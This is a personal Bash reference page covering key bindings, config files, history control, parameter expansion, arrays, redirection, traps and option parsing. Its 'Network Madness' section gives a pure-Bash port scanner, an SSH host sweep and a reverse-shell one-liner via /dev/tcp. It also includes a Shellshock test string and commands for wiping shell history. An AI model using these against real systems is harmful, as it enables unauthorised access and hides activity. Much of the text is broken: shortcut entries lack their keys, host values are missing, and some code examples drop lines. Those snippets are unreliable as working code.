Bash You Don’t Want To Use

September 2014 a very serious undocumented feature in Bash was published. Here’s how to check for it.

env x='() { :;}; echo vulnerable' bash -c "echo this is a test"

If this returns the word "vulnerable" then it is. If not, then no. Patches cleanly fix this but it’s a big problem for CGI enabled web-servers and DHCP servers.

Bash User Interactive Keys

I often forget useful Bash keyboard tricks because I have other ways of doing things. Here are some worth remembering.

Immediate Special Functionality

Here are some key bindings I’m trying to get better at using.


Run the previous command with rm substituted form ls. The final delimiter is optional.


Immediately substitute the last argument of the previous.


Back one word.


Forward one word.


Delete a word. Any leading spaces the cursor may be on get deleted too. Words are letters and numbers only — no symbols.


Toggles order of two words - "A B" becomes "B A" when cursor is between.


Toggles order of two letters, the cursor position and the position immediately before the cursor.


Turns a word into upper case - "sample" becomes "SAMPLE".


Turns a word into lower case - "SAMPLE" becomes "sample".


Capitalizes a word - "SAMPLE" or "sample" becomes "Sample". command.


Immediately substitute expansion of a star glob.


Propose results of expansion of a star glob.


Jump forward to the next occurrence of next typed character.


Jump backward to the next occurrence of next typed Note this is still the right bracket even moving left. character. Can also type ESC, then [C]-], then character to find.


Undo last command line edit operation. (Shift is used.)


Comment out the line and enter. Handy for preserving visibility of a command but not executing.


Cursor forward one character. Not too useful if you have arrows.


Cursor back one character. Not too useful if you have arrows.


Rather than doing a special thing when a special key is pressed, print the special key’s escape code.


Delete the word before the cursor (not including the cursor). Space delimited.


Char replicated number times.

Here’s some I know well, but will include for others.


Go to beginning of line.


Break the execution of the running process. Technically generates a SIGINT.


Same as the builtin exit which quits Bash. Must be at start of the line!


Go to end of line.


Classic use is a beep but I use it as my screen meta key.


Same as backspace. Maybe useful if you don’t have a backspace key or it’s not working.


New line (NL, aka line feed). Same as enter in Bash. This is the proper Unix newline (0A,\n).


Deletes (kills) everything from the cursor position to the end of the line, including the cursor position.


Same as the builtin clear which clears the screen.


Carriage return (CR). Same as enter in Bash though not the correct Unix newline.


Next in history. See [C]-p to go to some previous for this to have any effect.


Previous command in command history.


Resumes output. Can be critical if you accidentally pressed [C]-s and the terminal seems locked up.


Reverse search through the history. Type [C]-r and then some of the text included in the command you’d like to revisit. Keep pressing [C]-r if there are unwanted matching commands more recent than the one you want. When you’ve found the one you want, hit enter.


Stops output. Can be used to read things scrolling by quickly.


Deletes (kills) everything before the cursor position to the beginning of the line, excluding the cursor position.

Special Meaning Syntax


Substitute the last argument of the previous command.


Substitute all arguments of the previous command.


Substitute last command (I use up arrow for normal cases).


This has a lot of sensible tips about organizing and running more complex Bash programs.


Run bash with bash -x to have bash print out every thing it’s doing. To localize this effect, use set -x just before the code you want to examine and use set +x where you want that to stop.

I often do things like this.

echo "About to do this:"
echo ${CMD}
read -p "If this doesn't look right, press CTRL-C."
eval ${CMD}

Bash’s Crazy Config Files

In the /etc directory are some default bash config files that affect bash’s behavior unless countermanded by user set config files.

Other people have also tried to explain this.


This file is read and executed at initial login time by all users. I think that subshells ignore this. It also seems like this gets executed before the the xterm box is ready, so output from this script, like a message of the day, doesn’t seem to make it to the screen. It will make it to a log file however. This means that if you want to print a message or set the PS1 prompt variable, it won’t carry over when X subsequently opens up an xterm.


This file is read and executed by all bash initialization activity such as logging in by any user from anywhere and any sub shell that the user spawns. I think that this is referred to in a lot of unexpected places too. So it’s not smart to have anything too busy here. This file might actually be a fake. It isn’t mentioned in any documentation. It seems to be called from ${HOME}/.bashrc. Therefore, if that file doesn’t exist, then this one is useless. It’s not really a global catch-all if users can pull the reference from their ${HOME}/.bashrc, so I don’t really see the point to it. Although it would take up a trivial amount of extra disk space, a better way would be to have the things that you wanted in here, in a skeleton for creating ${HOME}/.bashrc files when you create new users.

I add plenty of personal optimization to my .bashrc but one of the more popular tricks is my prompt which keeps the user apprised of the exit status of the previous command. Like this.

:-> [host][~]$ true
:-> [host][~]$ false
:-< [host][~]$ true
:-> [host][~]$
My Happy Prompt
# xed- Fancy prompt      :->
BLU="\[\033[0;34m\]" #Blue.
LGY="\[\033[0;37m\]" #Light Gray.
LGR="\[\033[1;32m\]" #Light Green.
LBU="\[\033[1;34m\]" #Light Blue.
LCY="\[\033[1;36m\]" #Light Cyan.
YEL="\[\033[1;33m\]" #Yellow.
WHT="\[\033[1;37m\]" #White.
RED="\[\033[0;31m\]" #Red.
OFF="\[\033[0m\]"    #None.
LASTSTAT=":-\$(if [ \$? -eq 0 ] ; then echo -n '>' ; else echo -n '<' ; fi )"
if [[ "$UID" > "0" ]];
then # Normal User
    PS1="${LASTSTAT}${BLU}[${LGR}\H${OFF}${BLU}][${LCY}\w${BLU}]${LBU}\$${OFF} "
else # Root UID=0
    PS1="${LASTSTAT}${BLU}[${RED}\H${OFF}${BLU}][${LCY}\w${BLU}]${LBU}${SD}#${OFF} "

I won’t name anyone but I know some csh user who does not like tildes in prompts for home directories. The Bash answer is to use command substitution like this.

export PS1='[\h]$(pwd) $ '


This is the user’s chance to redo the initial login settings established by /etc/profile, if there is one. This does things once only on log in. If the user wants something run every time he logs in, like a back up or something, here’s the good place for it. Be aware that this file has no less than two functionally equivalent synonyms, 1.) ${HOME}/.bash_login and 2.) ${HOME}/.profile which are searched for in order.


This file is executed for all the owning user’s new shell activity. This means that these commands will be reissued for each and all subsequent subshells. This is where users can put custom aliases that should be very persistent. This file seems to execute quite frequently - 3 times on initial login for me and once for each subshell.


One of the extremely important features of the shell which elevates command line work from a nightmare to a joy is command history. If you’ve typed something complicated, you don’t want to type it again. Using the up arrow to revisit previous commands is the normal thing to do. Also typing history <N> will show you what is in the history for the last N lines. Ctrl-R will allow you to start typing something that will be matched with a command that is in history; keep pressing Ctrl-R until you get the matching command you want.

  • history -c - clear all entries, leaves the clearing command.

  • history -c && history -d $HISTCMD - clear all entries and tidy up the command that cleared them.

  • history -d 503 - delete the history at line 503 (check with history, no arguments)

  • set +o history - Turn OFF history recording. Use set -o history to turn it back ON. Also unset HISTFILE may be better if you want it off permanently.

  • export HISTCONTROL=ignoredups:ignorespace - Don’t bother with…

    • Wasting history lines on commands that are run multiple times in a row.

    • Saving a line that starts with a space. This can be handy to selectively leave certain commands, perhaps containing sensitive passwords, out of the history.

  • export HISTTIMEFORMAT='%Y-%m-%d ' - Turn on date recording in history so that the history [N] command will show when the commands were used.

  • export HISTSIZE=5000 - Sets number of lines to remember. Setting 0 will prevent history from being written. Setting a negative number will never rotate history and grow it until resource limitations. Note also HISTFILESIZE which is very similar but focuses on disk usage while HISTSIZE limits what can be in memory.

Note that there’s a decent man page for the GNU history C library that provides some interesting insight, man 3 history. And Bash’s built in help history.



When did this happen? I just learned that Bash has a += append operator. This is super useful! But don’t use it with /bin/sh since it’s a fancy feature of Bash.

$ typeset -i X=3
$ X+=5
$ echo ${X}
$ Y=3
$ Y+=5
$ echo ${Y}

$ typeset -i N=0; time while ((N<1000000)); do N+=1; done
real    0m4.107s
$ typeset -i N=0; time while ((N<1000000)); do N=$((N+1)); done
real    0m5.794s

This is also useful for Bash’s default string types. Here is a demonstration of building a binary number as a bit string.

$ unset B
$ B+=1
$ B+=0
$ B+=1
$ B+=0
$ echo $B

This can be very useful for building big lists of arguments over several lines. This allows for scripts to be neater and to perhaps selectively compose item sets with conditional statements. When creating a string of elements to process, separating by space is typical and often quotes (including a trailing space) are needed.

Parameter Matching Operators

  • ${variable#pattern} if pattern matches beginning, del shortest part

  • ${variable##pattern} if pattern matches beginnnig, del longest part

  • ${variable%pattern} if pattern matches end, del shortest part

  • ${variable%%pattern} if pattern matches end, del longest part

Here’s an example - this changes a big long list of x001.gif, x002.gif,etc to this b001.gif, b002.gif, b003.gif etc.

for ce in x???.gif; do mv $ce b${ce#x}; done

Another example - this converts a series of tif images with the names tb01.tif, tb02.tif,tbwhatever.tif to tb01.gif, tb02.gif, etc. It also changes the images to 15 color grayscale.

[~/xfile/project/pix]$ for ce in tb*.tif; \
> do convert -colorspace GRAY -colors 15 $ce ${ce%tif}gif; done

Default Substitution

One thing that is fairly common in scripts and quite useful is default substitution. The normal case is to supply a value to be used if the variable you refer to is null or unset.

echo ${1:-/default/path/instead}

Similarly, the := does much the same thing except that if the variable is unset, it is henceforth defined with the alternate value. This does not work with $1 and $$ and other fancy things. Keep it simple.

The previous example is in an echo statement. It is common, however, to need a default applied as a complete operation unto itself. This is, as far as I can tell, the only really sensible use of Bash’s built in : (colon) command. This command has pretty much no effect (to find it search for No effect in Bash’s man page). It does expand arguments and that’s why it is useful for replacing the echo (above example) if you don’t actually want an echo.

:-> $ : ${A:-wow}
:-> $ echo $A

:-> $ : ${A:=wow}
:-> $ echo $A

The :- will actually work with stuff like $1 because it does not try to change them, just return a different thing. Here is a nice little demo of this and the case/esac statement which can be used to choose which part of a multi-faceted script to run.

function f1 { echo "One" ;}
function f2 { echo "Two" ;}
case ${1:-0} in # If no $1 use 0.
    0) echo "Usage: $0 [0|1|2]" ;;
    1) f1;; 2) f2;;
    *) echo "Invalid";;

If you must have input, the :? will just spit out the pattern text to stderr. A generic message is used if you don’t provide one. Interestingly, you don’t actually need the : on this one.

:-> $ echo ${WTF}

:-> $ echo ${WTF?}
-bash: WTF: parameter null or not set
:-< $

Note the exit codes are different.

Finally, there is the weird case where if there is something, you want it to definitely be something else. If there is nothing, leave it alone as nothing. This is :+.

Substring Expansion

Not to be confused with the :- default substitution, the : can also be used to pick out substrings.

$ N=1234567890
$ echo ${N:3}
$ echo ${N:3:4}
$ echo ${N: -2}
$ echo ${N: -5: -2}
if [ "${TERM::6}" == screen ]; then echo "In a screen"; else echo "NOT in a screen";fi

Note the spaces between the colon and the dash. This is essential to avoid having Bash interpret these as default substitution (see above).

Here’s a useful application.

$ PARTITION=/dev/sdb1
$ echo "Drive:${DRIVE} Partition:${PARTNUM}"
Drive:/dev/sdb Partition:1

Changing Case With Expansion

You can also change case.

$ F="BIG & little |"; echo ${F,,} ${F,} ${F^^} ${F^}
big & little | bIG & little | BIG & LITTLE | BIG & little |

This operation can work on each member of an array automatically. Using this and substituting out spaces, you can probably make something that could go convert "some messy filename" into "SomeMessyFilename".

Arithmetic Expansion

I don’t know how long bash has had this, but it wasn’t a useful feature when I learned Bash a long time ago. But these days it is quite handy and elevates Bash to the status of quite a sensible general purpose language. Basically in the distant Unix past one had to use bc and dc and expr to get any kind of arithmetic done, even trivial things like incrementing a variable involved spawning a new shell and casting text strings every time. Now you can pretty much use the (( expression )) syntax and the expression will be evaluated in a pretty sensible way. If you need the expression to stand by itself as a process which produces its own exit code (like the old bc but I’m not sure a new process is actually spawned), then you can do something like this:

if (($RANDOM%2)); then echo Tails; else echo Heads; fi

If you need to produce the result for further consideration, you need to expand the expression like this:

echo $(($RANDOM%6+1)) # 6 sided dice
# Print a random line from a file:
F=file; sed -n "$(($RANDOM%`sed -n $= $F`+1))p" $F

Note that the performance of these operations can be suboptimal. Often spawning new shells for sub commands beats the arithmetic expansion.

$ X=0; time while (( X < 100000 )); do true $((X++)); done
real    0m2.794s
$ X=0; time for X in `seq 100000`; do true; done
real    0m1.176s

Oh and check out this:

$ X=0;time while (( X < 100000 )); do true $(( X++ )); done
real    0m2.875s
$ X=0;time while ((X<100000)); do true $((X++)); done
real    0m2.510s

Normally in Bash, it’s good to help the tokenizer by being explicit about where things are, but in this case, spaces just waste time.


Do the action 10 times concurrently:

for X in `seq 10`; do ( time python & ) ; done

SSH Escaping

Sometimes running complex things over SSH can be very annoying. Here is a complex example that has a redirect and glob and variables which is run in the background on several hosts at the same time.

for H in ${TheHosts[@]}; do
    echo "Processing ${TargetDir} on ${H}..."
    RCMD="${TheScript} ${TargetDir}/*.gz > ${TargetDir}/output.${H}.sdf;"
    RCMD="${RCMD} echo Done with ${H}"
    echo ${RCMD} | ssh ${H} $(</dev/stdin) &

For simple things, something like this works:

for H in ${TheHosts[@]}; do echo ${H};\
( time ssh ${H} bzip2 /tmp/zinc/thechosen1s.${H}.sdf & ) ; done


Bash has perfectly good support for Arrays. Search for /^ *Arrays in the man page for complete information.

Bash arrays start indexing at 0 (like C arrays).

This will print out a random file from the current directory:

F=(*);echo ${F[$((RANDOM%${#F[@]}))]}

Here is an example program that copies a large collection of files in a source directory to many different hosts (say in a cluster for processing) such that each host will receive the same number of files (to the extent possible):

# Where are the files coming from:
# What hosts will the files go to:
TheHosts=( c39 c40 c41 c42 c43 c44 c45 c47 c84 c85 c86 c87 c88 )

TheFiles=( ${SourceDir}/* )

for F in ${TheFiles[@]}; do
    echo "rsyncorwhatever ${F} ${TheHosts[C]}:/thedir/"
    C=$(( (C+1)%NofH ))

Here’s an example of using associative arrays. The trick is that they need to be declared with the -A option or else they’ll just act kind of funny if you’re unlucky enough to not get an explicit error (which happens). Also note that using keys with periods in them was not working for me. There may be a way to do it though.

declare -A D

for F in "${!D[@]}"
    wget -O${F}.zip ${BASE}${D[$F]}"

This example will download each zip file and save it based on the key ("", etc). This technique can be handy when sorting out a bunch of badly named things as in the example.

Interestingly enough, ${!D[@]} will make an iterable list of the keys even if the keys have spaces. In other words the for won’t iterate on each word of the keys.

Mass updating of files that contain similar things that need changing

Here is a method to massively update lots of files that all contain some bad thing and replace it with some good thing. There might be a smoother way to use the sed command, but redirecting to the same file causes the file to simply disappear. Using a tempfile works just fine.

$ for cxe in project??.type ; do cp $cxe temp.temp; \
sed s/bad/good/g temp.temp > $cxe; done

Here, all files that match the project??.type pattern (project01.type, project1a.type, etc) will be copied into the temporary file temp.temp and then they’ll be pulled back out into their real name line by line by sed which will also make substitutions as requested. In this case, it will change all references of "bad" to "good". Don’t forget to erase the residual temp.temp file when you’re done.

Another note - if the text is long, you need quotes around it so bash doesn’t get wise with it: sed s/"This is very bad."/Nowitsgood/g file

If the text has quotes in it:

$ for X in *.html; do cp $X temp.temp;\
> sed s/height=\"66\"/height=\"100\"/ temp.temp > $X; done

Here’s another example-

$ for XXX in *html ; do cp $XXX temp.temp; \
> sed -e "/---/,/---/s/<table>/<table align=center>/" temp.temp > $XXX; done

This only does the substitution after it finds 3 dashs and only until it finds 3 more dashes.

Useful Tips For Temp Files And Sudo

This useful program shows how to use proper mktemp temporary files. It also shows how to have commands run as root using sudo if the user running the script is not root.

function help { cat <<EOHELP
A simple script to save S.M.A.R.T. reports for hard drives for use
in later comparisons when units begin to fail. Saves in a filename
based on the serial number of the drive. Specify the drive,
just the "sd[a-z]" part, "/dev/" added automatically.
    $0 sda

# How to upgrade to root/sudo if regular user.
SUDO=''; if (( $EUID != 0 )); then SUDO='sudo'; fi

# Use a safe temporary file.
T=$(mktemp --tmpdir=${TDIR} smartstart.tmp.XXXXX)

# Check for such a drive.
if [[ -z "${D}" ]] || ! lsblk --nodeps -o NAME | tail -n+2 | grep "${D}" >/dev/null ; then
    lsblk --nodeps -o NAME | tail -n+2

${SUDO} smartctl -a /dev/${D} > ${T}
#For sensible name, extract unique serial number formatted like this.
#Serial Number:    WD-WCAYW0003385
N=smart-$(sed -n 's/^Serial Number: *\(.*\)$/\1/p' ${T})-$(date '+%Y%m%d')
mv ${T} ${TDIR}/${N}
echo "Report written to ${TDIR}/${N}"


Bash functions are quite useful. They are like bash aliases with the added ability to take parameters. Here’s an example of function use that I have in my ~/.bashrc:

# Break a document into words.
function words { cat $1 | tr ' ' '\n' ; }
function wordscounted { cat $1 | tr ' ' '\n' | sort | uniq -c | sort -n ; }

Another syntax that can be used is this.

words () { cat $1 | tr ' ' '\n' ; }

This is what the set command reports and is probably preferable even though it seems kind of "fake C" to me.

The automatic variable ${FUNCNAME} is available in the body of a function. The parameters supplied when the function was called can be accessed with $@ with $1 being the first one, etc.


How to redirect input from the output of a process
mount | grep sd[a-z]
grep sd[a-z] <(mount)

These both produce the same result.

How to pipe those nasty errors off to Neverneverland.
grep hattrick * 2> /dev/null

This will do the expected thing with stdout, but stderr will head off to the trash.

To get all of the garbage a command spits out to go to a file:

make &> compile.error
How to pipe those handy errors off to another command.
cmd1 2>&1 | cmd2
cdparanoia -Q 2>&1 | grep "no   no"

Many more fancy things can be done with pipes and redirection. It is possible to use the test command (which is related to the [] syntax since [ is an alias for test) to check for where a file descriptor is from. That’s confusing but this makes it clear:

    if [ -t 0 ]; then
        echo Interactive
        echo File descriptor 0 coming from a pipe

The exec command replaces the current process with a subshell containing the specified process as in exec takeoverthisjob -a args. An interesting effect and demonstration of the exec command is seen in the following example.

echo This is being sent to standard output like normal.
exec > logfile.txt
echo This is now being put in the logfile.

Complete Chat Utility Using Named Pipes

Here is a nice example of how to use named pipes to implement a complete private chat system. Imagine your user name is "primary" and your friend’s is "guest".

Put this in /home/primary/.bashrc

This is the named pipe which will contain your messages to the guest. Note that it goes in the guest’s home directory which you’ll need access to. These could go anywhere (somewhere in /tmp might be good).

Put this in /home/guest/.bashrc

Here’s the named pipe which you will look at to see the guest’s chat. After you specify where these will go, you need to create these named pipes once with this command:

$ mkfifo /home/guest/toprimary; mkfifo /home/guest/toguest

Next put these macros into both .bashrc files.

Chat macros
SEDSUB="s/^/ [$USER]: /"
alias listen='/bin/cat </home/guest/to$USER &'
alias chat="/usr/bin/sed -u '$SEDSUB' >$TOPIPE"

Now to chat both parties simply log in (SSH makes the whole thing pretty secure) and each types listen to start listening for the other’s text. And then they type chat to start sending. Now both parties can type and read the other’s typing.

Network Madness

Bash is so foolishly badass that it takes the place of pretty powerful network tools. It provides support for special device files that do things with arbitrary network sockets. The format for these is:


Note that these aren’t really files. They are very strange file-like interfaces. They only really work with redirection!

As an example, don’t have nmap lying around? This will cleverly scan for open ports using nothing but Bash.

for p in {1..1023}; do (echo >/dev/tcp/$p) >/dev/null 2>&1 && echo "$p open"; done

Want to just check if an SSH server is up?

:-> $ echo > /dev/tcp/
:-> $ echo > /dev/tcp/
-bash: System error
-bash: /dev/tcp/ Invalid argument
:-< $

Wonder which nodes on your cluster are accepting SSH connections? I found this was more helpful than nmap that whined about insufficient permissions with some simple usages. This one works very quickly but note that the results may not be in order.

for H in /dev/tcp/192.168.1.{1..254}/22; do ((timeout 2 bash -c "(>${H})" 2>/dev/null && echo "SSH UP: ${H}")&); done

Don’t have wget installed? This can work as a complete web client.

exec 3<>/dev/tcp/${}/80
printf "GET / HTTP/1.0\r\n" >&3
#printf "User-Agent: Just Bash\r\n" >&3
printf "\r\n" >&3
while read LINE <&3;do echo $LINE;done

In fact Bash makes reverse shells easy without using netcat on the target system. Run something like this on the remote system and connect to it with netcat or whatever you want locally.

exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0

To get an idea of what this can do look at the netcat example in my sound notes.


Often you’ll want to use xargs or Gnu Parallel but you will be frightened by very messy syntax. One way to get around such things is to use a bash loop to receive the output. Here’s how it would work:

find . | while read N; do md5sum $N; done
find . | while read N; do echo -n $N; md5 $N |sed -n 's/^.* / /p'; done

This will produce a list of check sums for all files in the current directory (and below). This command can be useful to create an inventory of what’s in a directory tree and compare with a directory tree elsewhere to see what has changed.

Here’s example showing how to avoid xargs:

cat excludes | while read X; do sed -i "/$X/d" mybiglist ; done

This takes a big list of things and a smaller list of things you wish were not in the big list and it looks through each item in the excludes list and removes it in place from the big list (if you’re using GNU sed, otherwise make your own temp file).

Careful when doing this not to find yourself in a subshell which has different variable scopes. For example, something like this could give unintended results.

$ ls | wc -l
$ X="0" ; ls | while read N; do X=$((X+1)); done ; echo ${X}
$ X="0"; F=$(ls); for N in ${F}; do X=$((X+1)); done ; echo ${X}

I’m sure there are even better ways to handle this.

Actually there are different ways, but this technique of piping to while read could be worse. Here’s an example of it being superior.

$ ls -1
c d
$ for N in $(find . -type f); do echo ${N} ; done
$ find . -type f | while read N; do echo ${N} ; done
./c d

Here the directory contains a file that includes a space. The for loop has trouble with this treating the space-separated parts of the filename c d as two items.


If you ever need to log something anywhere or do any kind of error monitoring or debugging, check out man logger. This is very handy and it’s universally available as an old school program yet I had never heard of it.

Here’s a clever way to turn off logging selectively (credit to

if [ $DEBUG ] ; then
    logger="echo >/dev/null"

Here’s a nice function that dresses up errors and puts them in stderr if the output is to a terminal.

function error { if [[ -t 2 ]] ; then echo $'\E[31m'"$@"$'\E[0m' ; else echo "$@" ; fi >&2 ; }

Signal Trapping

Trapping a signal is kind of exotic but when it’s a good idea, it’s a good idea. It can be good for things like cleaning up a mess before letting a user cancel an operation with Ctrl-C. For example (more from Dave Taylor):

trap '{ echo "You pressed Ctrl-C"; rm $TEMPFILE ; exit 1; }' INT
for C in 1 2 3 4 5 6 7 8 9 10; do echo $C; sleep 5; done

It can also be used as a timeout enforcer (though there are better ways). Basically spawn another background process that just waits the maximum allowed time and then raises a STOP signal. Then have the main thing that’s being limited trap for that. Here’s how:

trap '{ echo Too slow. ; exit 1 ; }' SIGALRM
( sleep 5 ; kill -s SIGALRM $$ 2> /dev/null )&
echo "What is the airspeed velocity of an unladen swallow?"
read OK
trap '' SIGALRM
echo "${OK} sounds reasonable to me."

Note that this little script will have problems if the main script exits cleanly and its process ID is taken by something else, something important that should not get a SIGALRM. Just keep that in mind.

To turn off a trap for the INT signal (as used in the previous example):

trap '' INT

Actually this might be better as it should reset to the way things were instead of clearing the traps.

trap - INT

You can check what’s active with just trap by itself.

The special DEBUG signal is always received when a command is entered. This can be useful for tricks like keeping your own log of commands that you run or perhaps a common history from multiple terminals.

trap 'echo $BASH_COMMAND >> /tmp/private_history' DEBUG

General Bash Syntax

Syntax for using the "for" structure.
for variablename [in <list of textstrings or files>]
    commands that take advantage of $variablename go here

Here’s another example. This little routine calculates (via exit code) whether a number is a power of 2 or not. Apparently sometimes big search engine companies care about such things.

$ for N in `factor 16384 |cut -d: -f2-`;do if expr $N \!= 2 >/dev/null;\
then break;fi; done; expr $N == 2 >/dev/null
Using Here Documents
# Heredocs are a way to put a lot of arbitrary text into a commands
# standard input stream. Can be good for CGI scripts and the like.
# Here is a sample program that illustrates the idea.
cat > test1 <<HEREDOC
<head><title>Here Doc Fun!</title><head>
# Note that the heredoc closer needs to be alone on the line.
echo Here are commands that aren\'t part of the heredoc
# Note the quotes in the following. These do what they should.
cat << "EOF_SIMPLE"
I owe $0 to you.
cat << EOF_FANCY
This program is called: $0
# Heredocs can send the contents of variables to stdin.
MESSAGE=".sdrawkcab si sihT"
rev <<<${MESSAGE}
# If you see "<<-", the dash means strip literal \t (tabs) from
# the beginning. This is for more natural indentation. I don't use it
# because I hate tab's non-obvious behavior.
# If you need the contents of the heredoc to populate the value of a
# variable, this is a way that seems to work.
This is a multi-line message that can easily be assigned to a variable
with few quoting worries. You can write whatever you like here and
then later combine it with other components or variables.
echo ${MESSAGE}   # Does not preserve line breaks!
echo "${MESSAGE}" # Preserves line breaks. Be aware how you use the variable.
read -d '' CONTENT <<"EOHEREDOC2"
This is probably an even better way to do this.
The -d option is the end of line delimiter. By
setting it to essentially nothing, the input is
not broken by line and the whole body is captured.
echo "${CONTENT}"


if/then/elif/else/fi constructions
read REP
if [ "${REP}" == "y" ]; then
  echo "Ok, starting...."
elif [ "${REP}" == "m" ]; then
  # This is lame programming but demonstrating that Bash has an `elif`
  echo "Maybe..."
  echo "Not doing anything."

It can get very tedious to use and remember the cryptic "CONDITIONAL EXPRESSIONS" (that’s a hint of what to search for in the man bash). It can often be polite and nice to make nicer sounding functions. Here is a reference of some of these tests in a format that is pleasant to use.

function is_empty { [[ -z "$1" ]] ;}
function is_not_empty { [[ -n "$1" ]] ;}
function is_file { [[ -e "$1" ]] ;} # or -a
function is_readable_file { [[ -r "$1" ]] ;}
function is_writable_file { [[ -w "$1" ]] ;}
function is_executable_file { [[ -x "$1" ]] ;}
function is_regular_file { [[ -f "$1" ]] ;}
function is_non_empty_file { [[ -s "$1" ]] ;}
function is_dir { [[ -d "$1" ]] ;}
function is_symlink { [[ -h "$1" ]] ;} # or -L
function is_set_var { [[ -v "$1" ]] ;} # Send "Name", not "${Val}"
function is_zero_len_string { [[ -z "$1" ]] ;}
function is_non_zero_len_string { [[ -n "$1" ]] ;}
function is_mod_since_read { [[ -N "$1" ]] ;}

Also if you need comparisons consider if [ arg1 OP arg2]; then ... fi. OP is one of these.

  • -eq - equal to (also == and maybe even = (see man page CONDITIONAL EXPRESSIONS))

  • -ne - not equal to (also !=, but who wants to use ! in bash?)

  • -lt - less than (also <)

  • -le - less than or equal to

  • -gt - greater than (also >)

  • -ge. - greater than or equal to

  • -ot - older than, modification date, args are files

  • -nt - newer than, modification date, args are files


The case statement, closed by esac, can be quite useful. Here’s a nice function I wrote that you can put in your .bashrc file which can help you open miscellaneous files. It shows a nice example of how to use case as well as associative arrays and some fancy parameter tricks. The value used in the case statement itself allows the input to ironically be case insensitive — different sense of "case".

function o {
    echo "Opening files..."
    declare -A X # Keyed by executable. Values are lists of files to launch using the key.
    for N in $*; do
        EXT=${N##*.} # Extract extension after last dot.
        N+=" " # Separate. Improve this if you're opening files with spaces in their names.
        case ${EXT,,} in
            jpg|jpeg|png)    X["feh"]+=${N} ;;
            mp4|mpeg|avi)    X["mplayer"]+=${N} ;;
            svg)             X["inkview"]+=${N} ;;
            pdf)             X["xpdf^-rv"]+=${N} ;;
            py|sh|c|cpp|cc)  X["vim^-c^\"set^ai\"^-c^\"set^tw=0\""]+=${N} ;;
            txt)             X["vim"]+=${N} ;;
            *) echo "Can't handle unknown type: ${EXT}" ;;
    for T in ${!X[@]}; do
        CMD="${T//^/ } ${X[$T]}"
        echo ${CMD}
        eval ${CMD} &

You just then need to say something like this to open files.

$ o img1.png photo2.jpg guide.pdf

And all that stuff will be properly opened. Add your own favorite handlers to handle your own favorite extensions.

The only problem I know about so far is that file names with spaces will probably be mishandled. (Of course you don’t use spaces in filenames, right?) It may be possible to handle that by putting a custom very unique delimiter in at the N+=" " line and then repairing it later when constructing the commands; probably best to also quote wrap everything if you’re doing that.

Consider "") do_empty_string;; to catch empty lines.

Simple Argument Handling

To allow specifying multiple items that must each be worked on, the shift built-in is a very typical way to iterate through them.

while [ -n "$*" ]; do
    echo "Processing $1"

This seems slightly nicer but maybe I’m overlooking something.

for N in $*; do
    echo "Processing $N"

Option Handling

This code shows two approaches to option handling. The first function uses getopts and is quite robust when dealing with single letter options. It can handle things like ./oh -caALPHA -bBETA -- dog -dashedarg. The second strategy can’t easily do this but it has the advantage of not using getopts at all and being able to match any kind of option, long or short. This makes input like this possible ./oh -b BETA --alpha ALPHA -c js c py. The caveat is that the input must have spaces to parse the options from the option arguments (not -bBETA). If you need a custom option handling scheme which can do something like -long1dash=bash this can probably be made to work by just replacing the = and looking for -long1dash. Another strategy that is not implemented would be to look for long options in the option string and replace them with short options and send on to getopts as normal.

The variable PARGS contains the "program arguments" which are not options and not option arguments. In the long option case, this starts off as the same list as the original input and non-qualifying components are removed explicitly with unset. The approach shown here is also a decent example of modularity and good code organization.

Option Handling With getopts
# oh - Option Handling Examples - Chris X Edwards

function show_usage {
cat << EOUSAGE
Usage: $0 [-h] [-a alpha] [-b beta] [-c] <arguments>
       -h = usage message
       -a = set alpha value [default 'First']
       -b = set beta value [default not set]
       -c = set gamma flag [default not set]
} # End function: show_usage

function handle_options_getopts {
    # Option letters followed by ":" mean has an OPTARG.
    while getopts "a:b:ch" OPTION
        case ${OPTION} in
            a) ALPHA=${OPTARG};;
            b) readonly BETA=${OPTARG};;
            c) readonly GAMMA="true";;
            h) show_usage && exit 0;;
    shift $((OPTIND - 1)) # Leave behind remaining arguments.
} # End function: handle_options_getopts

function handle_options_long {
    local ARGV=(${ARGS}) j=0
    PARGS=( ${ARGV[@]} ) # Program arguments (not options or option arguments).
    for OPTION in ${ARGV[@]}
        case ${OPTION} in
            -a|--alpha) ALPHA=${ARGV[j]}; unset PARGS[$i] PARGS[$j];;
            -b|--beta) BETA=${ARGV[j]}; unset PARGS[$i] PARGS[$j];;
            -c|--gamma) GAMMA="True"; unset PARGS[$i];;
            -h|--help) show_usage && exit 0;;
} # End function: handle_options_long

function display_options {
    [ "$ALPHA" ] && echo "Alpha is set to: $ALPHA"
    [ "$BETA" ] && echo "Beta is set to: $BETA"
    [ "$GAMMA" ] && echo "Gamma is set."
    echo -n "Arguments: "
    for OP in ${PARGS[@]} ; do echo -n "$OP " ; done
} # End function: display_options

readonly ARGS="$@"
ALPHA="DefaultValue"     # Set default value.
handle_options_getopts ${ARGS}